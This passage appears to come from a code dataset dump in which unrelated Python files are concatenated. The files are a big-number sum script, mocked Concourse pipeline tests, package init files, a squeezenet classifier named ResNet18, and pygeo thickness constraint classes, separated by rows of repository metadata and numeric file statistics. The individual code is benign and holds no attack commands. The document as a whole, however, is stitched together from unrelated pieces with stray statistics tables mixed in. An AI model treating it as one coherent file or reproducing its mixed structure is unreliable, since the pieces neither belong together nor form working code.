25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690
""".strip()
numbers = [int(row) for row in data.split("\n")]
# Python makes this question way too easy!
s = sum(numbers)
d = str(s)[:10]
print(d)
| 47.387387
| 50
| 0.969011
| 127
| 5,260
| 40.133858
| 0.96063
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.974859
| 0.024525
| 5,260
| 110
| 51
| 47.818182
| 0.018515
| 0.007605
| 0
| 0
| 0
| 0
| 0.977961
| 0.958222
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.009434
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3d02b19e0923b347aa2ea952bf51ed6b8b81876f
| 7,083
|
py
|
Python
|
tests/set_pipelines_test.py
|
Anthonyhawkins/concourse-kit
|
59c33b9d78480cc0acf32a06aac3b423621ab79f
|
[
"MIT"
] | null | null | null |
tests/set_pipelines_test.py
|
Anthonyhawkins/concourse-kit
|
59c33b9d78480cc0acf32a06aac3b423621ab79f
|
[
"MIT"
] | null | null | null |
tests/set_pipelines_test.py
|
Anthonyhawkins/concourse-kit
|
59c33b9d78480cc0acf32a06aac3b423621ab79f
|
[
"MIT"
] | null | null | null |
from unittest import mock
from unittest.mock import Mock
from unittest.mock import patch
import pytest
import sys
import os
from concoursekit import set_pipelines
from concoursekit import load_config
@patch("concoursekit.fly_run")
def test_set_pipelines_with_one_env(mock_fly_run):
cck_config = load_config()
set_pipelines(
environments=["dev"],
all_flag=True,
cck_config=cck_config,
plan_flag=False
)
mock_fly_run.assert_has_calls([
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'dev-bar-mgmt', '--config', 'dev-bar-mgmt.yml']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'dev-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'unpause-pipeline', '--pipeline', 'dev-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'dev-baz-mgmt', '--config', 'dev-baz-mgmt.yml', '--non-interactive']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'dev-baz-mgmt']),
mock.call(['fly', '-t', 'my-team', 'pause-pipeline', '--pipeline', 'dev-baz-mgmt']),
mock.call(['fly', '-t', 'concourse', 'set-pipeline', '--pipeline', 'dev-foo-mgmt-install', '--config', 'dev-foo-mgmt-install.yml', '--non-interactive']),
mock.call(['fly', '-t', 'concourse', 'hide-pipeline', '--pipeline', 'dev-foo-mgmt-install']),
mock.call(['fly', '-t', 'concourse', 'unpause-pipeline', '--pipeline', 'dev-foo-mgmt-install'])
], any_order=True)
@patch("concoursekit.fly_run")
def test_set_pipelines_with_two_env(mock_fly_run):
cck_config = load_config()
set_pipelines(
environments=["dev", "stage"],
all_flag=True,
cck_config=cck_config,
plan_flag=False
)
mock_fly_run.assert_has_calls([
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'dev-bar-mgmt', '--config', 'dev-bar-mgmt.yml']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'dev-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'unpause-pipeline', '--pipeline', 'dev-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'stage-bar-mgmt', '--config', 'stage-bar-mgmt.yml']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'stage-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'unpause-pipeline', '--pipeline', 'stage-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'dev-baz-mgmt', '--config', 'dev-baz-mgmt.yml', '--non-interactive']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'dev-baz-mgmt']),
mock.call(['fly', '-t', 'my-team', 'pause-pipeline', '--pipeline', 'dev-baz-mgmt']),
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'stage-baz-mgmt', '--config', 'stage-baz-mgmt.yml', '--non-interactive']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'stage-baz-mgmt']),
mock.call(['fly', '-t', 'my-team', 'pause-pipeline', '--pipeline', 'stage-baz-mgmt']),
mock.call(['fly', '-t', 'concourse', 'set-pipeline', '--pipeline', 'dev-foo-mgmt-install', '--config', 'dev-foo-mgmt-install.yml', '--non-interactive']),
mock.call(['fly', '-t', 'concourse', 'hide-pipeline', '--pipeline', 'dev-foo-mgmt-install']),
mock.call(['fly', '-t', 'concourse', 'unpause-pipeline', '--pipeline', 'dev-foo-mgmt-install']),
mock.call(['fly', '-t', 'concourse', 'set-pipeline', '--pipeline', 'stage-foo-mgmt-install', '--config', 'stage-foo-mgmt-install.yml', '--non-interactive']),
mock.call(['fly', '-t', 'concourse', 'hide-pipeline', '--pipeline', 'stage-foo-mgmt-install']),
mock.call(['fly', '-t', 'concourse', 'unpause-pipeline', '--pipeline', 'stage-foo-mgmt-install'])
], any_order=True)
@patch("concoursekit.fly_run")
def test_set_pipelines_without_envs(mock_fly_run):
cck_config = load_config()
set_pipelines(
environments=["!sandbox"],
all_flag=True,
cck_config=cck_config,
plan_flag=False
)
mock_fly_run.assert_has_calls([
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'dev-bar-mgmt', '--config', 'dev-bar-mgmt.yml']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'dev-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'unpause-pipeline', '--pipeline', 'dev-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'prod-bar-mgmt', '--config', 'prod-bar-mgmt.yml']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'prod-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'unpause-pipeline', '--pipeline', 'prod-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'stage-bar-mgmt', '--config', 'stage-bar-mgmt.yml']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'stage-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'unpause-pipeline', '--pipeline', 'stage-bar-mgmt']),
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'dev-baz-mgmt', '--config', 'dev-baz-mgmt.yml', '--non-interactive']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'dev-baz-mgmt']),
mock.call(['fly', '-t', 'my-team', 'pause-pipeline', '--pipeline', 'dev-baz-mgmt']),
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'prod-baz-mgmt', '--config', 'prod-baz-mgmt.yml', '--non-interactive']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'prod-baz-mgmt']),
mock.call(['fly', '-t', 'my-team', 'pause-pipeline', '--pipeline', 'prod-baz-mgmt']),
mock.call(['fly', '-t', 'my-team', 'set-pipeline', '--pipeline', 'stage-baz-mgmt', '--config', 'stage-baz-mgmt.yml', '--non-interactive']),
mock.call(['fly', '-t', 'my-team', 'hide-pipeline', '--pipeline', 'stage-baz-mgmt']),
mock.call(['fly', '-t', 'my-team', 'pause-pipeline', '--pipeline', 'stage-baz-mgmt']),
mock.call(['fly', '-t', 'concourse', 'set-pipeline', '--pipeline', 'dev-foo-mgmt-install', '--config', 'dev-foo-mgmt-install.yml', '--non-interactive']),
mock.call(['fly', '-t', 'concourse', 'hide-pipeline', '--pipeline', 'dev-foo-mgmt-install']),
mock.call(['fly', '-t', 'concourse', 'unpause-pipeline', '--pipeline', 'dev-foo-mgmt-install']),
mock.call(['fly', '-t', 'concourse', 'set-pipeline', '--pipeline', 'stage-foo-mgmt-install', '--config', 'stage-foo-mgmt-install.yml', '--non-interactive']),
mock.call(['fly', '-t', 'concourse', 'hide-pipeline', '--pipeline', 'stage-foo-mgmt-install']),
mock.call(['fly', '-t', 'concourse', 'unpause-pipeline', '--pipeline', 'stage-foo-mgmt-install']),
mock.call(['fly', '-t', 'concourse', 'set-pipeline', '--pipeline', 'prod-foo-mgmt-install', '--config', 'prod-foo-mgmt-install.yml', '--non-interactive']),
mock.call(['fly', '-t', 'concourse', 'hide-pipeline', '--pipeline', 'prod-foo-mgmt-install']),
mock.call(['fly', '-t', 'concourse', 'unpause-pipeline', '--pipeline', 'prod-foo-mgmt-install']),
mock.call(['fly', '-t', 'my-team-stage', 'set-pipeline', '--pipeline', 'stage-zoo-mgmt-install-stage', '--config', 'stage-zoo-mgmt-install-stage.yml']),
], any_order=True)
| 66.820755
| 161
| 0.607934
| 943
| 7,083
| 4.501591
| 0.060445
| 0.103651
| 0.142521
| 0.155477
| 0.949117
| 0.934511
| 0.915194
| 0.915194
| 0.915194
| 0.903416
| 0
| 0
| 0.10377
| 7,083
| 106
| 162
| 66.820755
| 0.668715
| 0
| 0
| 0.6875
| 0
| 0
| 0.518492
| 0.05703
| 0
| 0
| 0
| 0
| 0.03125
| 1
| 0.03125
| false
| 0
| 0.083333
| 0
| 0.114583
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3d5cf1631c30a614aa6de76de6a9e79b8d565286
| 32
|
py
|
Python
|
aiproteomics/rt/datasets/__init__.py
|
ai-proteomics/aiproteomics
|
125aed4b3528bfd40349ef932034d9532ab969c3
|
[
"Apache-2.0"
] | null | null | null |
aiproteomics/rt/datasets/__init__.py
|
ai-proteomics/aiproteomics
|
125aed4b3528bfd40349ef932034d9532ab969c3
|
[
"Apache-2.0"
] | 14
|
2022-03-30T19:49:30.000Z
|
2022-03-31T11:39:27.000Z
|
aiproteomics/rt/datasets/__init__.py
|
ai-proteomics/aiproteomics
|
125aed4b3528bfd40349ef932034d9532ab969c3
|
[
"Apache-2.0"
] | null | null | null |
from . import AIProteomicsHela1
| 16
| 31
| 0.84375
| 3
| 32
| 9
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0.125
| 32
| 1
| 32
| 32
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1864f0f352df51dde8cedb5d0c2bfa627f9b2e93
| 161
|
py
|
Python
|
jumpscale/clients/syncthing/__init__.py
|
zaibon/js-sdk
|
cd1d26f2c3343884c1927ceef7c1e12e3f7da905
|
[
"Apache-2.0"
] | 13
|
2020-09-02T09:05:08.000Z
|
2022-03-12T02:43:24.000Z
|
jumpscale/clients/syncthing/__init__.py
|
zaibon/js-sdk
|
cd1d26f2c3343884c1927ceef7c1e12e3f7da905
|
[
"Apache-2.0"
] | 1,998
|
2020-06-15T11:46:10.000Z
|
2022-03-24T22:12:41.000Z
|
jumpscale/clients/syncthing/__init__.py
|
zaibon/js-sdk
|
cd1d26f2c3343884c1927ceef7c1e12e3f7da905
|
[
"Apache-2.0"
] | 8
|
2020-09-29T06:50:35.000Z
|
2021-06-14T03:30:52.000Z
|
def export_module_as():
from jumpscale.core.base import StoredFactory
from .syncthing import SyncthingClient
return StoredFactory(SyncthingClient)
| 23
| 49
| 0.78882
| 17
| 161
| 7.352941
| 0.764706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161491
| 161
| 6
| 50
| 26.833333
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a10617704e4d9fc613fdf949c90f383e74b505a6
| 41
|
py
|
Python
|
part2/__init__.py
|
gdhGaoFei/Python01
|
a9fef5290479d575725e2ddbb83c5f2d192606c6
|
[
"MIT"
] | 1
|
2019-06-22T23:27:48.000Z
|
2019-06-22T23:27:48.000Z
|
part2/__init__.py
|
gdhGaoFei/Python01
|
a9fef5290479d575725e2ddbb83c5f2d192606c6
|
[
"MIT"
] | null | null | null |
part2/__init__.py
|
gdhGaoFei/Python01
|
a9fef5290479d575725e2ddbb83c5f2d192606c6
|
[
"MIT"
] | null | null | null |
from part1 import *
print("part2 ่ขซๅฏผๅ
ฅไบ ")
| 13.666667
| 20
| 0.707317
| 6
| 41
| 4.833333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0.170732
| 41
| 3
| 20
| 13.666667
| 0.794118
| 0
| 0
| 0
| 0
| 0
| 0.261905
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
a1179d08af4684bdc6f96b83be24ae08eccb306c
| 3,130
|
py
|
Python
|
models/resnet.py
|
kreimanlab/AugMem
|
cb0e8d39eb0c469da46c7c550c19229927a2bec5
|
[
"MIT"
] | 6
|
2021-04-07T15:17:24.000Z
|
2021-07-07T04:37:29.000Z
|
models/resnet.py
|
kreimanlab/AugMem
|
cb0e8d39eb0c469da46c7c550c19229927a2bec5
|
[
"MIT"
] | null | null | null |
models/resnet.py
|
kreimanlab/AugMem
|
cb0e8d39eb0c469da46c7c550c19229927a2bec5
|
[
"MIT"
] | null | null | null |
'''
Implementation of resnet-18
'''
import torchvision.models as models
import torch.nn as nn
#class ResNet18(nn.Module):
#
# def __init__(self, model_config):
# self.config = model_config
# super(ResNet18, self).__init__()
#
# self.model = models.resnet18(pretrained = self.config['pretrained'])
#
# # freezing weights for feature extraction if desired
# if self.config['freeze_feature_extract']:
# for param in self.model.parameters():
# param.requires_grad = False
#
# if self.config['n_class'] is not None:
# print("Changing output layer to contain {} classes".format(self.config['n_class']))
# self.model.fc = nn.Linear(512, self.config['n_class'])
#
#
# def forward(self, x):
# out = self.model(x)
# return(out)
#class ResNet18(nn.Module):
#
# def __init__(self, model_config):
# self.config = model_config
# super(ResNet18, self).__init__()
#
# self.tempmodel = models.vgg16(pretrained = self.config['pretrained'])
#
# if self.config['n_class'] is not None:
# print("Changing output layer to contain {} classes".format(self.config['n_class']))
# self.model = nn.Sequential(self.tempmodel.features,
# self.tempmodel.avgpool,
# nn.Flatten(),
# *(list(self.tempmodel.classifier)[0:-1]),
# nn.Linear(4096, self.config['n_class']))
# else:
# self.model = nn.Sequential(self.tempmodel.features,
# self.tempmodel.avgpool,
# nn.Flatten(),
# self.tempmodel.classifier)
#
# # freezing weights for feature extraction if desired
# if self.config['freeze_feature_extract']:
# for param in self.model.parameters():
# param.requires_grad = False
#
#
# def forward(self, x):
# out = self.model(x)
# return(out)
class ResNet18(nn.Module):
def __init__(self, model_config):
self.config = model_config
super(ResNet18, self).__init__()
self.model = models.squeezenet1_0(pretrained=self.config['pretrained'])
# freezing weights for feature extraction if desired
if self.config['freeze_feature_extract']:
for param in self.model.parameters():
param.requires_grad = False
if self.config['n_class'] is not None:
print("Changing output layer to contain {} classes".format(self.config['n_class']))
self.model.classifier[1] = nn.Conv2d(512, self.config['n_class'], (3, 3), stride=(1, 1), padding=(1, 1))
self.model = nn.Sequential(self.model, nn.Flatten())
def forward(self, x):
out = self.model(x)
return out
| 37.710843
| 116
| 0.532907
| 327
| 3,130
| 4.95107
| 0.217125
| 0.11118
| 0.061149
| 0.088944
| 0.822112
| 0.7832
| 0.7832
| 0.7832
| 0.7832
| 0.7832
| 0
| 0.019579
| 0.347284
| 3,130
| 82
| 117
| 38.170732
| 0.772883
| 0.670927
| 0
| 0
| 0
| 0
| 0.099174
| 0.022727
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.117647
| 0
| 0.352941
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a13da8f040aa8c7fcac1087553566ff2363f4dfc
| 201
|
py
|
Python
|
mosdef_gomc/__init__.py
|
GOMC-WSU/MoSDeF-GOMC
|
6cd58531c4f2fc575938d98373401a94b843e4bd
|
[
"MIT"
] | 2
|
2022-03-23T18:46:40.000Z
|
2022-03-28T22:34:24.000Z
|
mosdef_gomc/__init__.py
|
GOMC-WSU/MoSDeF-GOMC
|
6cd58531c4f2fc575938d98373401a94b843e4bd
|
[
"MIT"
] | 2
|
2022-03-28T22:41:50.000Z
|
2022-03-28T23:22:34.000Z
|
mosdef_gomc/__init__.py
|
GOMC-WSU/MoSDeF-GOMC
|
6cd58531c4f2fc575938d98373401a94b843e4bd
|
[
"MIT"
] | 1
|
2022-03-22T23:49:24.000Z
|
2022-03-22T23:49:24.000Z
|
"""mBuild: a hierarchical, component based molecule builder."""
from mosdef_gomc.formats.charmm_writer import Charmm
from mosdef_gomc.formats.gomc_conf_writer import GOMCControl
__version__ = "0.1.0"
| 33.5
| 63
| 0.81592
| 28
| 201
| 5.535714
| 0.678571
| 0.129032
| 0.180645
| 0.270968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016484
| 0.094527
| 201
| 5
| 64
| 40.2
| 0.835165
| 0.283582
| 0
| 0
| 0
| 0
| 0.036232
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a1c5e3ced1d8ca612c8488e541b2d5584cad1f52
| 29
|
py
|
Python
|
python/darknet/core/__init__.py
|
elsampsa/darknet-python
|
6c62a5934082157154087809d67d0ee43384cc7a
|
[
"MIT"
] | 10
|
2019-05-10T07:26:56.000Z
|
2021-04-22T18:59:12.000Z
|
python/darknet/core/__init__.py
|
elsampsa/darknet-python
|
6c62a5934082157154087809d67d0ee43384cc7a
|
[
"MIT"
] | null | null | null |
python/darknet/core/__init__.py
|
elsampsa/darknet-python
|
6c62a5934082157154087809d67d0ee43384cc7a
|
[
"MIT"
] | 4
|
2018-11-16T00:55:41.000Z
|
2020-09-29T03:44:28.000Z
|
from .darknet_core import *
| 14.5
| 28
| 0.758621
| 4
| 29
| 5.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 29
| 1
| 29
| 29
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b80a160b55eb567826ffac5d12122b08836324c6
| 138
|
py
|
Python
|
main.py
|
likelion/script.tubecast
|
33c6bd7f87dfdca3e86a0dc2239a31d3f43a0450
|
[
"MIT"
] | 83
|
2018-03-16T21:42:59.000Z
|
2022-03-13T20:51:41.000Z
|
main.py
|
likelion/script.tubecast
|
33c6bd7f87dfdca3e86a0dc2239a31d3f43a0450
|
[
"MIT"
] | 52
|
2018-03-29T01:35:10.000Z
|
2022-03-01T15:48:24.000Z
|
main.py
|
likelion/script.tubecast
|
33c6bd7f87dfdca3e86a0dc2239a31d3f43a0450
|
[
"MIT"
] | 34
|
2018-03-28T13:58:46.000Z
|
2021-12-06T11:13:48.000Z
|
# -*- coding: utf-8 -*-
from resources.lib import service
from resources.lib.kodi import kodilogging
kodilogging.config()
service.run()
| 17.25
| 42
| 0.746377
| 18
| 138
| 5.722222
| 0.666667
| 0.252427
| 0.31068
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008264
| 0.123188
| 138
| 7
| 43
| 19.714286
| 0.842975
| 0.152174
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
b82036dddb6b1959bf0b831a086f6bda29450362
| 72
|
py
|
Python
|
setup.py
|
anaquin135/flaskURL
|
458ca5b2264117f94a4ff68d5395a3d81ec6458b
|
[
"MIT"
] | null | null | null |
setup.py
|
anaquin135/flaskURL
|
458ca5b2264117f94a4ff68d5395a3d81ec6458b
|
[
"MIT"
] | null | null | null |
setup.py
|
anaquin135/flaskURL
|
458ca5b2264117f94a4ff68d5395a3d81ec6458b
|
[
"MIT"
] | null | null | null |
from flaskURL import db
from flaskURL.models import URL
db.create_all()
| 18
| 31
| 0.819444
| 12
| 72
| 4.833333
| 0.666667
| 0.413793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 72
| 4
| 32
| 18
| 0.920635
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
62c504618cd99786ac886c55e14f2395d4a6422e
| 6,884
|
py
|
Python
|
pygeo/constraints/thicknessConstraint.py
|
jrram/pygeo
|
ed15c848703a90055d38130b6d05cef8080a9d68
|
[
"Apache-2.0"
] | null | null | null |
pygeo/constraints/thicknessConstraint.py
|
jrram/pygeo
|
ed15c848703a90055d38130b6d05cef8080a9d68
|
[
"Apache-2.0"
] | null | null | null |
pygeo/constraints/thicknessConstraint.py
|
jrram/pygeo
|
ed15c848703a90055d38130b6d05cef8080a9d68
|
[
"Apache-2.0"
] | null | null | null |
# ======================================================================
# Imports
# ======================================================================
import numpy as np
from .. import geo_utils
from .baseConstraint import GeometricConstraint
class ThicknessConstraint(GeometricConstraint):
"""
DVConstraints representation of a set of thickness
constraints. One of these objects is created each time a
addThicknessConstraints2D or addThicknessConstraints1D call is
made. The user should not have to deal with this class directly.
"""
def __init__(self, name, coords, lower, upper, scaled, scale, DVGeo, addToPyOpt, compNames):
super().__init__(name, len(coords) // 2, lower, upper, scale, DVGeo, addToPyOpt)
self.coords = coords
self.scaled = scaled
# First thing we can do is embed the coordinates into DVGeo
# with the name provided:
self.DVGeo.addPointSet(self.coords, self.name, compNames=compNames)
# Now get the reference lengths
self.D0 = np.zeros(self.nCon)
for i in range(self.nCon):
self.D0[i] = np.linalg.norm(self.coords[2 * i] - self.coords[2 * i + 1])
def evalFunctions(self, funcs, config):
"""
Evaluate the functions this object has and place in the funcs dictionary
Parameters
----------
funcs : dict
Dictionary to place function values
"""
# Pull out the most recent set of coordinates:
self.coords = self.DVGeo.update(self.name, config=config)
D = np.zeros(self.nCon)
for i in range(self.nCon):
D[i] = np.linalg.norm(self.coords[2 * i] - self.coords[2 * i + 1])
if self.scaled:
D[i] /= self.D0[i]
funcs[self.name] = D
def evalFunctionsSens(self, funcsSens, config):
"""
Evaluate the sensitivity of the functions this object has and
place in the funcsSens dictionary
Parameters
----------
funcsSens : dict
Dictionary to place function values
"""
nDV = self.DVGeo.getNDV()
if nDV > 0:
dTdPt = np.zeros((self.nCon, self.coords.shape[0], self.coords.shape[1]))
for i in range(self.nCon):
p1b, p2b = geo_utils.eDist_b(self.coords[2 * i, :], self.coords[2 * i + 1, :])
if self.scaled:
p1b /= self.D0[i]
p2b /= self.D0[i]
dTdPt[i, 2 * i, :] = p1b
dTdPt[i, 2 * i + 1, :] = p2b
funcsSens[self.name] = self.DVGeo.totalSensitivity(dTdPt, self.name, config=config)
def writeTecplot(self, handle):
"""
Write the visualization of this set of thickness constraints
to the open file handle
"""
handle.write("Zone T=%s\n" % self.name)
handle.write("Nodes = %d, Elements = %d ZONETYPE=FELINESEG\n" % (len(self.coords), len(self.coords) // 2))
handle.write("DATAPACKING=POINT\n")
for i in range(len(self.coords)):
handle.write(f"{self.coords[i, 0]:f} {self.coords[i, 1]:f} {self.coords[i, 2]:f}\n")
for i in range(len(self.coords) // 2):
handle.write("%d %d\n" % (2 * i + 1, 2 * i + 2))
class ThicknessToChordConstraint(GeometricConstraint):
"""
ThicknessToChordConstraint represents of a set of
thickess-to-chord ratio constraints. One of these objects is
created each time a addThicknessToChordConstraints2D or
addThicknessToChordConstraints1D call is made. The user should not
have to deal with this class directly.
"""
def __init__(self, name, coords, lower, upper, scale, DVGeo, addToPyOpt, compNames):
super().__init__(name, len(coords) // 4, lower, upper, scale, DVGeo, addToPyOpt)
self.coords = coords
# First thing we can do is embed the coordinates into DVGeo
# with the name provided:
self.DVGeo.addPointSet(self.coords, self.name, compNames=compNames)
# Now get the reference lengths
self.ToC0 = np.zeros(self.nCon)
for i in range(self.nCon):
t = np.linalg.norm(self.coords[4 * i] - self.coords[4 * i + 1])
c = np.linalg.norm(self.coords[4 * i + 2] - self.coords[4 * i + 3])
self.ToC0[i] = t / c
def evalFunctions(self, funcs, config):
"""
Evaluate the functions this object has and place in the funcs dictionary
Parameters
----------
funcs : dict
Dictionary to place function values
"""
# Pull out the most recent set of coordinates:
self.coords = self.DVGeo.update(self.name, config=config)
ToC = np.zeros(self.nCon)
for i in range(self.nCon):
